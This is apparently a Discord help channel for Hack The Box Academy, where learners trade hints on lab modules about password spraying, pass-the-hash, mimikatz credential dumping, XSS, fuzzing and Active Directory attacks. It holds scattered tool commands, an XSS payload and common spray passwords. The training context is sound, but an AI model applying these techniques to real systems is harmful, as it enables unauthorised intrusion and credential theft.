powershell has filtering

but in machine i am at command prompt

you mean in CMD? but CMD has filtering also, not as good as powershell's but still useful

i used it in command prompt like find,findstr,tree

in the hint it is also showing tree

in that case, checking the forums would probably help since i have not doen this module, but gave a little suggestion

ok

#cwes I don't know who to contact. The support team sent me here. It's about Skills Assessment - File Inclusion. I use the same payloads, on same endpoint. step by step on solution, but not see the flag.
whats wrong?

you can drop into powershell from the cmd line btw

Anyone know why academy VPN is acting up? I'm connected all fine and able to ping the machine but my SSH session a lot of the time just comes to a complete freeze and have to fire up another terminal and connect back in.
Killing the VPN and reconnecting works for a little bit but it does it again. This has applied to a lot of the lab machines and becomes quite frustrating. I've tried switching VPN servers but the issue persists

It's something that's been bothering me now for like 2-3 months so thought I'd msg here to see if someone has a fix

What is the difference between using MySQL -u username -p —windows-auth vs not using windows-auth?

Hey all! I need some help with the Pass the Certificate module for Password Attacks. What channel would be appropriate?

https://dev.mysql.com/doc/refman/8.4/en/pluggable-authentication.html
instead of using a user/pass in the database, it instead uses Windows authentication methods to query NTLM for users authentication

And will it work only on domain computers ?

It works on computers that rely on Windows auth mechanisms

Here's what I'm getting

Is there a better channel I should ask in? lol

this is best channel for asking questions about modules, since you are not getting responses, it is great idea to check older message by searching Password attacks Pass the Certificate or check forums if dicussed, i also saw couple of reddit posts on this section

I have a problem with this one task:
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.
, How to do it? I already have fie downloaded, and tried isolate it using regex expression, but expression that was working on regex tool didn't work in command, and tools don't offer output, only highlighting, I tried hand picking links, and used couple of methods to filter them out, but nothing gives me correct answer.

There is an error in the printerbug command. Only the DC IP address should be specified; adding a port is incorrect.

Still the same. Over VPN, it gives me this error. But when I try to do it in the HTB AttackBox, it gives me host offline.

Send me dm, so we don't bother anyone here.

Hey everyone got a qeustion about the Cross-Site Scripting (XSS) module, specifically the XSS Discovery,
Im running the same command as in the example and it's not finding any reflection:
python3 xsstrike.py -u "http://94.237.61.249:56154/index.php?task=test"

    XSStrike v3.1.5                                                                                                                                                                      

[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: task
[-] No reflection found

Example:
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

    XSStrike v3.1.4

[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: task
[!] Reflections found: 1
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 3072

[+] Payload: <HtMl%09onPoIntERENTER+=+confirm()>
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N]

What am i missing?

cant reach the target, i already tried restarting it and the VPN and nothing changes, any idea what's the problem?

even from the pwn box i can't ping the target....

https://tenor.com/view/star-trek-next-generation-gif-1106832380275309695

can someone help me with Password Attacks - Pass the Certificate

What are the contents of flag.txt on jpinkman's desktop?

and

What are the contents of flag.txt on Administrator's desktop?

You can dm me if you want

Does anyone know the windows event logs and finding evil module cold? I forgot some of it and decided after my flu dies down I’m gonna redo the module from scratch using the chrome add on that hides flags in hack the box.

I will want to redo it sometime this week and really make sure I get it before moving onto the next module but I need someone who knows the module cold in case I get stuck.

Is anyone available? Only say yes if you know the subject matter of that one module cold.

So that I can ask for help if necessary

If I get stuck

And make sure I understand it since its a short one but appears important for CDSA

Also will learning KQL or taking a KQL course help me with CDSA?

I heard knowing KQL is highly beneficial

I know KQL is covered in CDSA but will a separate course just on that accelerate my CDSA learning if I do it?

i'm stuck on the admin part. I got the DC ticket but can't ADSync, secretsdump shows nothing

im still stuck on the jpinkmans desktop, im gettin ghelp on it though, nothing seems to be working

you think you can help me?

and once i got the ticket i made ||ptt using evil-winrm||

got it

hello all, in AD Enumeration & Attacks - Skills Assessment Part II Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.
is it snaffler? or i should spray ?

Hello everyone, anyone I can DM for the Advanced XSS and CSRF Exploitation Skills Assessment? Need a nudge if you can for the first portion of the exploit. TIA!

Instead of asking what you should do, just try.

already do both

• what is the best password spray list i should follow ?

Ho, has anyone finished the Wi-Fi Penetration Testing Tools and Techniques: Skills Assessment? Any hints on the last question about connecting to Inlane-Corp and accessing 172.27.0.1 to get the flag? 🥴

Spray with a single password. Use something simple and basic

i need help, skills assessment API Attacks

i see pass pol is 1 as minumum
try '1' and Password123 and Welcome1 as there arent account lockout

can someone help me with Password Attacks - Pass the Certificate

What are the contents of flag.txt on jpinkman's desktop?

and

What are the contents of flag.txt on Administrator's desktop?

i advise to try it by your self

i have, i just give up at this point

you can ask where are you stick

but never ask for flag

i didnt ask for the flag bro what?

Dm me

Finished the Wifi penetration testing path. Anyone would need anytips/hint let me know

I run into this issue guys. Not sure how, I did the exact thing HTB shows, but it doesn't return that OneDrive password.
there is one command you should try though and is not mentioned (which I think it should be added). That or we all are on a different environment and we must give ourselves admin creds or something like that....

||sekurlsa::cred||

Dm me

A

anyone finished the AI Red Teamer path fully? I wanna skip the Fundamentals of AI module so badly due to the crazy amounts of theory in it 🤣

might just go thru the other modules for the interesting and practical stuff

@inland shoal I am working on Attacking AI - Application and System module right now - stuck on the assessment though - i cannot get the flag

nvm got the flag - holy hell

can someone help me with Password Attacks - Pass the Certificate

What are the contents of flag.txt on jpinkman's desktop?

and

What are the contents of flag.txt on Administrator's desktop?

I’ve been stuck on this for 9 hours

Is it just me, or is the “Skills Assessment - Password Attacks” module packed with concepts that weren’t covered in the “Password Attacks” module? I know a cheatsheet is provided, but the skills and techniques required to complete the assessment are far beyond what is covered, I don't think anyone can complete it without personal research or googling.

I want to think it is by design, or, is it that I just I have not fully grasped the content of the module.

Any thoughts? #modules #general #cpts

Hi there, from Password Attack > Cracking Protected Archives , I'm having an issue when using losetup -f -P Private.vhd with the following error :

losetup: Private.vhd: failed to set up loop device: No such file or directory

I think this is because I'm using Exegol (docker container), however I set this instance with "Privileged: On" so I should be able to do it though, anybody with the same issue ? cheers!

Anyone did the Password Attacks - Network services and its question: " Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." it's taking forever to crack WinRM service :v

It's taking quite a long time to crack with netexec any other tools I could use to perhaps fasten the process?

nvm Just as I asked the question it returned the result, good thing the combination is more on top and not at the bottom otherwise I'd have to spent a good hour or two just waiting

that is probably because loop device is the same in everyone, i also faced this error, search how can you list loop devices in your machine and mount the file to it, you can use AI for this

Hi, I am stuck on Q2 of the DACL Attacks II skill assessment. I have 2 possible paths, but am missing one step in each of them. Can I DM someone for a nudge?

Dm

Wi-Fi Penetration Testing Tools and Techniques > Skills Assessment (https://academy.hackthebox.com/module/298/section/3962)

I have technical problems with the last task.

DHCP does not work and if I set a static IP I cannot reach the gateway. I restarted the lab multiple times.

Does anyone else have this problem, found a solution or is it just broken?

Hi, if i have gold sub for academy and complete various path during the subscription, after the subscription is expired, i still have the modules unlocked?

nice 🔥 but i was asking if the Fundamentals of AI part is ok to skip 😅

All modules that you have completed 100% during your subscription are yours to keep, and you will still have access to them even after your subscription expires.

Ok thanks

guys i've been stuck in this question since yesterday
i tried running nmap identify the services running on the server then i used msfconsole to search for puplic plugin exploit but every exploit i used will either don't run or i'll get "Exploit completed, but no session was created"
Module: getting started section: public exploits

guys Ive used gobuster a shit tone of times but it seem to not work...
I am doing Virtual Host and Subdomain Fuzzing and trying to solve the qustion

The exploit you're looking for isn't going to net you a shell. I suggest only focusing on the ip:port given, and maybe visiting it in a browser

Try adding --domain inlanefreight.htb

Also is inlanefreight.htb in your hosts file?

yes see first command

Ah missed it

still getting the same error

afaik i do not need vpn

Try respawning target

right?

Nope, vpn not required

I already did that 3 times xD

Only thing I can think of is specifying the ip:port for -u and adding the --domain inlanefreight.htb flag

yeah i can not think of anything else and do not want to waste more time on it

the next qustion works since it is about inlanefreight.com

so i think the first one is just broken

so should i search for a 22/tcp exploit for example?

No

could you give some hints

ive been trying for hours now

I gave a hint in my initial reply

browser

http://ip:port

i have visited it

i thought u meant the website alone

ill try this one

i have vistited it, so i should look for wordpress backup exploit right?

Correct, they were nice enough to give you the version too :D

I mean go for it lol…I wish I could skip evasion right now lol

does this mean that i have exploited the server, and how can i read or download the backup wordpress

Make sure you set rhosts and rport correctly, and read all the options

RHOSTS ive tried the ip

You dont specify http or port in rhosts

Just the ip or domain

Rport is where you specify port (hint. It wont be 22)

Filepath-> the path to the file on the remote system, not on your system

Rport i tried with 22 111 4240

Use the port provided to you. Don't go beyond that

you mean this one 40191?

i dont get this one should i set etc/passwd ?

The default is /etc/passwd as a proof of concept. But the question tells you where the flag is 😉

/flag.txt so i should put this ?

Yup

When it runs it'll tell you where it saved the file to

thanks for the help ill try it now

final question how can i find this file cause i cant find it

nvm

i forgot that i had to use cat command

not a directory

Yeah i forgot about it then i used cat and got the answer

Thanks for your help throughout the question

np

Hey I'm actually doing the Active Direcotry LDAP module

I have a problem with the last question of the Skill Assesment

can I get some help ?

hey guy,

going through windows lateral movement and got stock on winrm third flag to connect do DC01. i been there for over a 1 i cannot find a way around. please, can someone provide any hints? much appreciate it

hi im lock on this question from the web fuzing module (What flag do you find when successfully fuzzing the GET parameter?) i tried with this command :wenum -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 -u http://94.237.53.134:38607/get.php?X=FUZZ

anyone on Active directory? I am using inveight to retrieve NTLMv2 (windows version) but I have no results. So, I think I am doing something wrong. I connect via RDP to attacker box. Go to c:\tools and run the tool (powershell). What am I forgetting?

Which module/section ?

https://academy.hackthebox.com/module/143/section/1420

Should be straigthforward with the command shown in the section

the reading tells you how to interact with inveigh; press esc then type help for some commands

did you complete the windows lateral movement module? i really need help on winrm section 🙏🏻

link to the module/section?

Is this in CPTS path ?

CAPE

Can't help you then sorry

thanks tho

I think so. I had to disable sniffer due admin permision error and after a while I run the command GET NTLMv2 and no hashed there

you mean from windows lateral movement module winrm section?

Hey all, I am on the "Attacking Common Applications" module, section "Attacking Drupal" I am trying to exploit the "Leveraging the PHP Filter Module" to get a shell, but when I came to choose the Text format there was no PHP code option. Is this intended?

https://academy.hackthebox.com/module/280/section/3131

sorry I reply wrong :--)

Solved. Powershell must be executed as administrator. Something that the module didn't indicate. Thank you

Depending on the version of Drupal, you must install the PHP module or enable it.

What are you on about, you have to have the PHP module to even be on the page I showed in the screenshot

But the Text formant doesn't have the PHP code option

Will do, maybe I'm in the wrong mb

Thanks

module is above tier 0; please refrain from sharing direct screenshots from it :)

sorry! my bad

I am currently doing the "Attacking Drupal" exercise, trying to get the flag.
The drupal version is ||7.30|| the PHP filter exists and I gave all users permissions to use it, but I still can't use the PHP code option

Also can you please elaborate why we can't share screenshots above tier0?

paid content

:)

.......

So why isn't this a paid users only channel?

because tier 0 modules exist

....

and you can still ask and help others without sharing screenshots or things directly from the module

do you have a problem here with Bakal?

Great lets limit the payed users in favor of people that don't pay haha

But I will respect that

no?

it also falls in line with their streaming/writeup/etc. guidelines

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

I see, thanks for explaining it 🍻

then why were you replying to them with .......?

It felt like something that didn’t really need to be asked, it kinda caught me off guard how basic it was

just because it catches you off guard doesn't mean it isn't a question that people naturally have.

It wasn’t about him. I didn’t mean to make fun of anyone, I just reacted to the question and myself makes a lot of dumb questions

then you can easily use an emoji reaction instead of replying with ... is my point lol

Fair enough

Yeah, I could’ve reacted with an emoji, but sometimes a ‘…’ just fits better than sugarcoating.

or sometimes, the best thing to say is nothing at all. You don't need to reply with anything if you have nothing to contribute.

Sure… sorry I didn’t just scroll past.

anyone that has done windows lateral movement module could help me out please?

What section are you having trouble with?

Im doing something wrong ?

https://academy.hackthebox.com/module/263/section/3087 last exercise before the optional one

Try some of the things taught at the beginning of this paragraph Lateral Movement From Windows in that section.

i will try thanks for the hints.

i even tried double pivot but none worked man...dang it

Do you have RDP Access to a target?

with double pivot? no i havent. when i tried with single pivot to srv01 it does not forward to the dc01

You should have credentials to access the external target interface via RDP.

do i even need double pivot tho? or everything shoukld be done via single pivot point?

That all depends on how you intend to tackle it. I think you can likely just follow along with the content covered in the section, which if I remember correctly did not perform a pivot (I could be wrong though). Can probably move laterally by LOTL.

sounds good. i will try again. literally ,i exchausted my option here. thanks man!

If you're still stuck you can hit me up. I'm working so I may not be as responsive, but I'll get back to you.

no problem. i might be here for the next 30 minutes and then i hit you up for extra help. ty alot

Hey i doing a module and got stuck on a hash, i found it try to cut it in different ways (full string, just salt, just hash) and submit it as an answers but it won't accept it as the answer even though it specifically says the user hash password, here is the question:
What is the password hash for the user 'admin'?
what do i need to submit?

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

In the module SQL Injection Fundamentals last part Skills Assessment

it's just looking for the value that's in the database

got it, pasted it, not accepting it

it's the whole $...$...

did that

including the info in the commas

yep the whole string from start to finish

with the v,m,t values and the argon

Tried it a few more times and it worked on the 3/4 attempt 🤷‍♂️

Thanks for the help

Wi-Fi Penetration Testing Basics - last question

Connect to the WiFi network and submit the flag found at IP 192.168.1.1 or 192.168.2.1.

Hi everyone, I’m stuck at the connection stage.
I already captured the handshake, cracked the password (m********), and I have the SSID ***, the BSSID D8:D6:3D:EB:29:D5, and the channel.
I configured the connection using both wpa_supplicant and nmtui/nmcli, but the NetworkManager doesn’t seem to find the HTB network (it only shows another visible SSID, GAMMER‑5G).
I tried all connection methods like GUI, CLI...but nothing working

Any guidance would be appreciated, thanks!

Hi everyone

I’m currently working through the Penetration Tester job role path. I wanted to ask whether it’s worth repeating the Fundamentals modules multiple times (
Linux Fundamentals, Windows Fundamentals, Introduction to Networking, Introduction to Web Applications, Web Requests, JavaScript Deobfuscation, and Introduction to Active Directory) or if it’s better to continue step by step with the next modules and let my understanding deepen naturally through the labs and hands-on practice.

Thanks for your opinions.

Just continue forward, as long as you understand the concepts you should be fine in moving forward

Thank you very much

I'm currently working on "RDP and SOCKS Tunneling with SocksOverRDP" in the Pivoting, Tunneling, and Port Forwarding section of the CPTS, and I'm having trouble connecting to the 2nd hop.

I ran the SocksOverRDP server file as Admin on the DC/Pivot Host, and in Proxifier I set everything up exactly as the module says. 127.0.0.1 Port 1080 Socks5. When I try to connect, I keep getting this error even after resetting the box multiple times.

I did everything exactly as the module says. I even tried using the tips from "BAlkan_BAndit" in the forum post here and it still didn't work. https://forum.hackthebox.com/t/pivoting-tunneling-and-port-forwarding-academy/259382/65?page=4

Any tips?

Password Attacks - Pass The Hash

Stuck at finding David and Julio's hashes. Every time I try to access ||\DC01\david|| from david's account, I get a permission denied, same for Julio. I also set ||LocalAccountTokenFilterPolicy|| to ||0x1|| in the registry for HKLM. Admin CMD with net view doesn't seem to help either. Doing this from RDP btw.

Tried going through some previous messages in this discord related to this task, but doesn't seem like anyone else is having this issue.

Did you try Path-The-Hash from mimikatz ?

Maybe you don't have the hash yet ?

Idk where you are stuck exactly

Module: AD Trust Attacks
Section: Skills Assessment

Could someone help me with Q1?

Done!! after 2 days 🥲

You’re not entering the correct IP

I am

anyone can help me with this error message please?

I RDP'd to the DC, and even pinged the other IP from it

Did you use the same IP as the reading material?

yea

even made sure I used the 172.15.6 subnet instead of 172.15.5

Already || dumped the SAM from the admin account. || Got David's hash and || used it to RDP ||, then I tried to use file explorer to access share, but access denied, same with PowerShell/CMD. I haven't tried mimi yet, will try it.

i've set breakpoints to get the value of rax throughout the program but i can't get the correct answer, any debuggers that can help?

from Intro to Assembly > Debugging with GDB

Anyone know if the list_methods.js script in the Android Application Dynamic Analysis (Altering Method Values) works as it just prints [*] Class enumeration complete as soon as the Android app opens

Why does no one ever want to help me with modules when I ask?

Supplements probably weren’t helping by the way but I think I got a test that showed another medical condition and after I correct that I think hack the box will be doable. Good news is it’s probably a one month thing and not any more than that so I know it will probably work.

But I feel like when I ask for help I get ignored.

Like with a module

I've seen people help you so that's not true at all. My guess would be when you ask no one who is paying attention to the channel has done the module and they don't know themselves. Plus not everyone helps people.

Ok sorry

I didn’t mean to sound whiny

Anyway I am trying a new medical treatment starting tomorrow and when I know if its effective I’m gonna try CDSA again

I think my snails pace at HTB is related to my medical issue but now I think unlike the supplements this new treatment will probably work

I think someone who actually can do htb wouldn’t have thyroid issues

That’s the main thing here

But I’m fixing that and in a month I’ll try HTB CDSA again

actually that’s probably my issue this whole time

hey bro, can I DM u? I'm also doing CDSA

anyone know or have any ideas please 😅

Sure

hi im lock on this question from the web fuzing module (What flag do you find when successfully fuzzing the GET parameter?) i tried with this command :wenum -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 -u http://94.237.53.134:38607/get.php?X=FUZZ

I'm currently working on Attacking WPA3 Wi-Fi Networks - OWE Evil Twin Attack and getting the following errors:

• invalid key_mgmt `OWE
• WPA-PSK enabled, but PSK or passphrase is not configured
  Is anyone available for help?

What section is that

can u link it?

guys only I have problems with targets or it is a problem now?

they are spawning all the time

On an engagement you have gone on several social media sites and found the Inlanefreight employee names: John Marston IT Director, Carol Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You decide to use these names to conduct your password attacks against the target domain controller. Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)

@dusk holly if you can help me

Can you specify section

Bro just spawned in less than a minute

Are you batman?

yeah, tell nobody though

Attacking Active Directory and NTDS.dit

i thing he is

i didn't have any problem with this section, where are you stuck right now and what have you tried

but when i type it and presse enter its say its not good ?

they are asking for John Marston's password

ahhhh

dawn okay

Sorry for wasting your time

also don't forget to delete

nah, i can respond while studying no problem

thanks

yo are a pro in the role

if i get the CPTS do i get this role after ?

nah, bro i am not, i don't even have CPTS

preparing for it

me too

wby

i am preparing for it to

awesome, can i DM you

yeah

Hi all, Im stuck at HTTP Misconfigurations - Skills Assessment - Hard, would like to ask if there are any hints and can anyone point me at the right direction?
I can't seem to find an unkeyed parameter.... I do know that its vulnerable to parameter cloaking due to it using python bottle. But that's about it ):

https://academy.hackthebox.com/module/280/section/3131

DMs

hi guys ah do i have to submit the answer in flag format like htb{....}? cuz i tried to submit the version only but it didnt work

use other argv on nmap -sC ....

got it but i have to submit the answer in the flag format htb {....} or the version just?

did u include the service name as well

yes -sV

i mean in the answer

yeh i did but nope. ill try again to be sure.

okay, good luck

hello guys I have a problem to setup the env for module /170/section/1674 SAML env I add the hosts to /etc/hosts but I can't reach out to them anyone faced this before

did but no still

that "submit the flag" in question i suspect u have to submit answer in flag forma htb{..} maybe?

generally no need for htb{}

unless the answer has it (e.g. task is reading from a file and its content is in htb{.+})

i see i tried the most of the scan. tried to submit the version in different format but still no so shd i try scan other ports then?

did u include whatever inside the parentheses or no?

and u shouldnt change the format, just copy-paste the value in version column should work

i did

ah yes yess

got it

i have done service version nmap run but i didnt find any flag in flag format

ah to dm it say u have to add me friend

WAIT 1min

Hi, can someone help me with Q2 of DACL 2 SA?

Review the logon scripts and GPO sections.

it was a permission problem. I repeat the lab using a console as administrator and it worked fine. Thank you

hello guys I have a problem to setup the env for module /170/section/1674 SAML env I add the hosts to /etc/hosts but I can't reach out to them anyone faced this before

Hi there can someone help me with File Upload Attacks module Filter types section I got the file upload successfully response but when i got to the corresponding url to get the flag i get URL Not found any idea?

Anyone else getting issues with rdp connection in Windows Fundamentals module ? i cant connect with the VPN or the pwnbox

Hello Guys has anyone completed Hacking Wordpress module?

Lots of people have

Password Attacks -> Pass the Hash
Ok so I figured it out, I'm gonna just leave a message in case some else has this same issue || I had to RDP pth as david, the open an admin CMD, then use mimikatz pth to david (david -> david, not sure why?). Then type dir \\DC01\david\david.txt and I got the flag||. Not sure if it's me fumbling the bag on my end or a bug, but if I || RDP pth in as Admin, and do mimikatz pth to david, or do any pth technique with david's hash, I'll log in as inlanefreight\david, but I just won't be able to access that share, so I had to do another pth with mimikatz||.

Good evening my friends, sorry to bother you, but I wanted to ask a question. If any of you have already worked on this module, I would appreciate any advice, as I've tried several payloads all day today to get the answers and haven't succeeded. If any of you could give me just a hint of what to execute, I would be grateful. Thank you and have a great night. This is the SQLINJECTIONFUNDAMENTALS module. This is the question: What is the password hash for the user 'admin'? (last page of the module). Sorry for not speaking very well, as I am Brazilian.

send me dm

I'm having issues with this one too, I have the full exploit working but it seems like the admin never interact with the endpoint

God, thank you, no wonder why my exploit never triggered admin

Hello there! I'm a little stuck with the end of the module Incident Handling Process > Skills Assessment. I'm not able to get the information that i need to answer the questions. Can somebody help me?

@west yacht Please take care not to post content from modules above tier 0. Especially skill assessments, your picture contained spoilers.

Are you connected to the vpn and is that the target ip?

Windows Lateral Movement - Skill assessment - Q2 - What's the content of the flag located at C:\Users\Arturo\Desktop\flag.txt ? I have a session as arturo. However, there is nothing on his desktop. Is anyone available for a hint?

I can't spawn a target in the module/147/section/1657

any help please? I just keeps looping at Target(s) are spawning...

the numbers don't help, just say the module and section. but for your question it doesn't really matter. try ctrl+r on the website then try spawning it again. otherwise maybe wait 15 mins and try again.

thanks it's for Windows Lateral Movement Techniques > Pass the Ticket (PtT) from Linux

I'll wait then!

if that doesn't work you can reach out to support but if it's really stuck it should time out after a bit

anyone debuggers in the house or have recently done the Intro to Assembly module? i'm stuck figurging something out using gdb

Did you read the hint?

Yes, I have an RDP session as arturo.

the flag should be there

I'm resetting the target now. If that doesn't work, can I dm?

yeah

Hey all, I'm trying to do the WPS Module, and I've gotten to the point where I"m trying to use wpspin, but that git repository no longer exists.

I haven't done that, but if you can't get the tool on your VM it should be on the pwnbox

i believe they have the tools in /opt

wait don't those force you to use an attacker box?

yeah look in there it's probably already there

oh duhhh of course I"m using the rdp stuff

the task is to: "+ 1 Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?" so that should be setting a breakpoint in gdb with: "break *_start+16" or "break *_start+16" but when i then run the program neither value of rax is the correct answer

thanks I was having a moment

womp womp

Is anyone available for a DM to help with the Attacking WPA3 Networks Evil Twin Attack questions?

ls E:\

hello!
i am currently in "PASSWORD ATTACKS" module
and "Spraying, Stuffing, and Defaults" section
question is "Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>) "
I've got 100 credential lines from MySQL — any hint which one is the right cred for answer?

try the credentials from the provided link and search my MySQL user:pass there not that many

i mean i already logged into mysql after ssh, got creds from table but there are like 100 username and password in that table

i am thinking to go for brute force but it's lazy option

asking for if there is something else i should do it

they want you to the submit the MYSQL credentials not the username and password in the tables (IIRC)

bruh

i tried that, i really tried that and it didn't work that time (probably forget to add a letter...) now it worked; thanks

I am in Password attacks module on attacking AD and ndts.dit module doing the Submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive) I compiled a list of names of the potential targets (3 people) and enumerate valid users with Kerbrute but i'm getting "2026/01/15 01:46:36 > [!] marston.john@inlanefreight.local - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting..." for each users (21 variations) hmm I do see the usernames that the hint provided (InitialLastName)

I am doing intro so bash scripting, module conditional execution. The task was to count the characters of the base64 encoded variable, which was encoded 40 times and I needed to count the variables after 35 times. So... I got the answer after checking the soltions, but it is not clear why. To count the characters inside the variable, I used "length". However, the solution used "wc -m". Why should I haven known, that i needed to use wc -m instead of length? I have a coding background (mainly C), but no bash scripting experience

nvm* future reference if anyone meets this problem, you need to find its internal domain and not assume it to be inlanefreight.local

RTFM 😉 wc -m counts chars, the way that they expect you to do things is to echo things through (which leaves behind some newlines) while bash DOES have it's own way of counting length, that's not expected here

https://man7.org/linux/man-pages/man1/wc.1.html

my best guess is there's a different word instead of task

haven't done that module though

#cwes There is a Skills Assessment – File Inclusion. Did you have any issues exploiting the RCE?

didn't have issues exploiting the RCE, did have issues finding the intended way (following the walkthrough)

hm, okay

but you can dm me, it's a simple error - but if you don't wanna DM; look at the apply form 😉

it was a walkthrough error though if you're trying to follow that, I posted in #1234357888114364508 with the issue

Command injection - Bypassing Other Blacklisted Characters. Can I get some assitance on this end of task question?

Getting started | Module Service Scanning | Section 7.
May someone please tell me what I'm doing wrong? 🙂

We already did, you haven't changed it

I highly recommend reacquainting yourself with https://man7.org/linux/man-pages/man5/hosts.5.html

But as you probably won't read that, as we already said remove /index.php. The hosts file is an override for DNS lookups. You provide it with an IP address, and one or more hostnames which will take precedent for any DNS lookup and resolve to the IP stated in the hosts file.

Also, check back over the previous section which walks you through the purpose of the /etc/hosts file https://academy.hackthebox.com/module/77/section/847 @rocky jasper

it looks like adding an entry into the hosts file isn't required

Solved this now , not happy. When using the correct payload more than once it does not give any output

something wrong with that lab

nothing in this section requires you to connect to a website

Indeed

so editing the hosts file is a moot point

not everything you read in the modules is going to mirror the environment

hi guys can someone help me with
Cross-Site Scripting (XSS) Phishing? I have a solution that is technically working but i still get the message issue with website i wrote the support because its not my fault but they didnt want to help me...

can any one support me in this module Bypassing Wi-Fi Captive Portals

DM me

NEED HELP: I am working on the CJCA path as a beginner I am learning a lot, but I am on the intro to networking module right before linux basics. I am just not really retaining any of this its just a lot of text with things I dont understand. Will it all clear up and get used again later or do I need to understand this all now?

hello, did u solved it? i got that issue a while ago so i just skipped that section, i read in the forums that it could be because of the vpn and it worked fine on the pwnbox

https://tenor.com/view/eat-happy-ebichu-gif-19759300

Hey everyone, do you think HTB will drop a new Purple Teamer certification in 2026? If so, what do you think the focus will be? Maybe adversary emulation and detection engineering?

https://tenor.com/view/balthazar-balancoir-hamster-gif-5086350111865782297

Hello everyone, i am on the last question of DACL I skill assessment and it is saying to read the Flag on the admin desktop, i found and i got to José and i saw that has writedacl rights a specific group and that group had read gmsa password. Every time i try to read the gmsa password and i use José ntlm hash it says the credentials invalid when they are not an i tried using netexec to read the gmsa Ntlm for the svc account but still no dice i had jose own the group that has the rights to the GMSA password reader edge. Can someone tell what i am doing wrong in a dm.

I've simple question, if I subscribed the silver annual billing, can I see the step-by-step module solutions of CWEE modules? (After purchasing the cubes of this module)

yes

you'll likely need to enable it in your settings

hello i tri to fuzz for the vhosts i trie with this command gobuster vhost -u http://inlanefreight.htb:4240/ -w /home/guillaume/tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain i tried with the common.txt wordlist too and the other open port its (virtual hosts and subdomain fuzing module )

I assume you abused the DACL correctly that is necessary to read that password? You can DM to avoid spoiling.

sorry i did it with the pwnbox.. but thank you despite..

you can DM me

I’m in the pivoting tunneling and port forwarding module and two of the tools introduced, rpivot and dnscat2 are either a pain to install because they require older python libraries or they are not supported on Apple silicon. Could I use ligolo in place of rpivot and iodine in place of dnscat2? Or will the exam specifically require rpivot and dnscat 2?

You could use virtualenv to setup the appropriate environment in isolation

https://virtualenv.pypa.io/en/latest/

Or miniconda https://www.anaconda.com/docs/getting-started/miniconda/main

I understand that the tools could be installed in a virtual environment but my question is whether we are limited to only using those tools or could use ligolo and iodine instead for the course and exam.

Aha ok. I'm honestly not sure, but I know others have mentioned using ligolo. Iodine, that doesn't ring a bell

If they achieve the same goal, then I don't see why not

https://academy.hackthebox.com/module/167/section/1636

Module: IntroToWindowsCommandLine

Section: AllAboutCMDletsAndModules

Having issues with the last question, which is to practice installing and loading modules on the target.

Find-Module returns nothing, so I tried formatting it with Find-Module | Format-Table, nothing.

I verified it exists with Get-Module PowerShellGet

I further verified with PowerShellGet -ListAvailable

PS C:\Users\htb-student> Get-PSRepository
WARNING: Unable to find module repositories.

Register-PSRepository, following the steps, gives an error to add the -Default option, but doing that returns nothing and doesn't fix the issue.

I'm guessing I'm missing something since when I tab auto-complete it corrects to PSRepository, as if it already exists? Or is this somekind of issue being on powershell 5.1? Or am I just taking the task too literally...

EDIT: I'm using pwnbox.
Bonus question: Why do some powershell options become invisible as I type them? Is this some kind of weird issue with psreadline?

Im using pwnbox because i was getting the same issue on my kali but its still not working. Does anyone know why and what the issue could be?

Try checking out this article with suggested params for effective RDP connections https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn#h_480d492483

I changd the IP (reset) too it asked for certificate again and same issue

thanks I'll

Also good to mention which Module and Section you are working on

Sorry.

I am working on Windows event logs, Introduction.

I tried this

Ok

Look at the command very carefully under Practical Exercises

There's something different in your command

This is above Tier 0 mind, so I can't say much else tbh

https://tenor.com/view/bigbird-one-of-these-things-is-not-like-the-others-gif-11251276

is it this? (the password)?

The password is fine.

get this error 😅

ok let me have another look

It's something else near by

Yeah do, there's something obviously different, but easy to miss, and that error is a big clue.

Going to bed, you got this

nn.. again 🙂

good night!

and thanks for pointing it out, im tryna have a look now 😅

thank you I managed to do it after looking at practical exercises

Are there any clues I can get for the WPS skills assessment? I've so far tried all the strategies I can from the module, but none of it seems to work, unless I want to let the bruteforcing go for more than 10 minutes or something.

hi guys can someone help me with
Cross-Site Scripting (XSS) Phishing? I have a solution that is technically working but i still get the message issue with website i wrote the support because its not my fault but they didnt want to help me...

Oh.. was looking at the wrong answer 😅

I can't help directly with content I'm afraid, but hopefully someone will be able to help you out with a nudge

tried refreshing the page multiple times but nothing 🙁 anyone else experiencing similar issues?

i thought i was the only one

idk whats going on :/

i tried using a different vpn, tried signing out, tried using a different browser. nothing

hella annoying tho.

yeah seems like a problem on their side

wait mine just loaded

maybe try refreshing your page?

i think their services are down but i check the status page and it says everything is "operational"

fr mine loaded too

lool hella weird

no kidding lol

wht module u doin?

network foundations

been meaning to finish this one for months now but i kept skipping it and moving to a different one

ahh I see, which path is that? I think I remember doing that but it was earlier on

cybersecurity analyst. I took a break from the the penetration tester path cause the password attack module took me such a long time to finish and it was mentally draining.

I can imagine. I think I was on that exact module too last time I was on it. Im working on the SOC analyst path rn

im doing the cybersecurity analyst now hoping i can start cybersecurity this year.

sounds good. If ur looking for a study partner feel free to dm!

Appreciate the help man.

did you solve it? the same trouble

Yes

@rustic sage how did you solve?

Wait I can't answer now

